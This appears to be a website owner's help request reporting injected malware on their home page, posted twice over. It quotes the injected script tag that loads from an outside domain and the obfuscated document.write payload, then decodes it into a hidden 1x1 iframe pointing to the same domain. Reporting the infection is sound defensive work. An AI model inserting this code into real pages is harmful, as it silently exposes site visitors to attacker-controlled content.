My site has been infected with a malicious script. In the middle of a random spot in the source code of my home page (www.inboxcomics.com) the following code has been inserted:
<!-- . --><script src="https://www.securedatas.download/jquery-3.2.1.min.js"></script><!-- . -->
This is not a link to a jquery library. It is a malicious script that contains obfuscated code which replaces my DOM with an iframe of the website securedatas [dot] download, which Google Chrome tells me is malicious.
Malicious code (obfuscated):
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%77%77%77%2E%73%65%63%75%72%65%64%61%74%61%73%2E%64%6F%77%6E%6C%6F%61%64%2F%6D%65%6D%62%65%72%73%2E%68%74%6D%6C%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%30%70%78%20%23%66%66%66%66%66%66%20%6E%6F%6E%65%3B%22%20%6E%61%6D%65%3D%22%66%6F%6F%74%65%72%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%22%30%70%78%22%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%22%30%70%78%22%20%68%65%69%67%68%74%3D%22%31%70%78%22%20%77%69%64%74%68%3D%22%31%70%78%22%20%61%6C%6C%6F%77%66%75%6C%6C%73%63%72%65%65%6E%3E%3C%2F%69%66%72%61%6D%65%3E'),"gl");
The same code, but unobfuscated:
document.write('<iframe src="https://www.securedatas.download/members.html" style="border:0px #ffffff none;" name="footer" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="1px" width="1px" allowfullscreen></iframe>',"gl");
As a result, Google Chrome is rightly giving a warning to visitors to my site (see attached image).
How did this malicious script get inserted onto my site? I use Cloudflare, x10, and Namecheap. I'd hazard a guess it came in through x10, as the alternative is that Cloudflare or Namecheap was hacked (unlikely). Could this be looked into? Thanks so much! If there's anything I might have done to cause this, please let me know!
<!-- . --><script src="https://www.securedatas.download/jquery-3.2.1.min.js"></script><!-- . -->
This is not a link to a jquery library. It is a malicious script that contains obfuscated code which replaces my DOM with an iframe of the website securedatas [dot] download, which Google Chrome tells me is malicious.
Malicious code (obfuscated):
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%77%77%77%2E%73%65%63%75%72%65%64%61%74%61%73%2E%64%6F%77%6E%6C%6F%61%64%2F%6D%65%6D%62%65%72%73%2E%68%74%6D%6C%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%30%70%78%20%23%66%66%66%66%66%66%20%6E%6F%6E%65%3B%22%20%6E%61%6D%65%3D%22%66%6F%6F%74%65%72%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%22%30%70%78%22%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%22%30%70%78%22%20%68%65%69%67%68%74%3D%22%31%70%78%22%20%77%69%64%74%68%3D%22%31%70%78%22%20%61%6C%6C%6F%77%66%75%6C%6C%73%63%72%65%65%6E%3E%3C%2F%69%66%72%61%6D%65%3E'),"gl");
The same code, but unobfuscated:
document.write('<iframe src="https://www.securedatas.download/members.html" style="border:0px #ffffff none;" name="footer" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="1px" width="1px" allowfullscreen></iframe>',"gl");
As a result, Google Chrome is rightly giving a warning to visitors to my site (see attached image).
How did this malicious script get inserted onto my site? I use Cloudflare, x10, and Namecheap. I'd hazard a guess it came in through x10, as the alternative is that Cloudflare or Namecheap was hacked (unlikely). Could this be looked into? Thanks so much! If there's anything I might have done to cause this, please let me know!
